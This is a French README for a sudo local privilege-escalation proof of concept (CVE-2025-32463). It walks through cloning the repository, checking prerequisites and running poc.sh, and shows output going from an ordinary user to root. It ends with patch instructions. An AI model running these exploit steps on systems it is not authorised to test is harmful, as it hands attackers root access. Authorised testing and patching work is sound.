
# CVE-2025-32463 – Exploit d'élévation de privilèges Sudo (PoC) avec .so précompilé
Ce dépôt contient un exploit preuve de concept (PoC) pour CVE-2025-32463, une vulnérabilité locale d'élévation de privilèges dans sudo découverte par Rich Mirch.
https://github.com/kh4sh3i/CVE-2025-32463
Ce PoC est uniquement destiné à des fins éducatives et de test autorisé. N'utilisez pas ce code sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite d'évaluer.
git clone https://github.com/zinzloun/CVE-2025-32463.git
cd CVE-2025-32463
Vérifiez si l'utilisateur actuel dispose de faibles privilèges
:~/CVE-2025-32463$ id
uid=1001(poc) gid=1001(poc) groups=1001(poc),100(users)
Vérifiez les prérequis
:~/CVE-2025-32463$ sudo --version
Sudo version 1.9.15p5
...
:~/CVE-2025-32463$ ls -al /etc/nsswitch.conf
-rw-r--r-- 1 root root 526 Feb 16 20:57 /etc/nsswitch.conf
Exécutez l'exploit
:~/CVE-2025-32463$ chmod +x poc.sh && ./poc.sh
woot!
root@ubutes01:/# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(poc)
Pour les systèmes connectés, exécutez simplement :
sudo apt update && sudo apt upgrade
Pour les systèmes hors ligne (air-gapped) : vous pouvez obtenir le dernier paquet sudo ici : https://github.com/sudo-project/sudo/releases/download/v1.9.17p1/sudo_1.9.17-2_ubu2404_amd64.deb. Une fois le paquet transféré sur le système cible, exécutez simplement :
sudo dpkg -i sudo_1.9.17-2_ubu2404_amd64.deb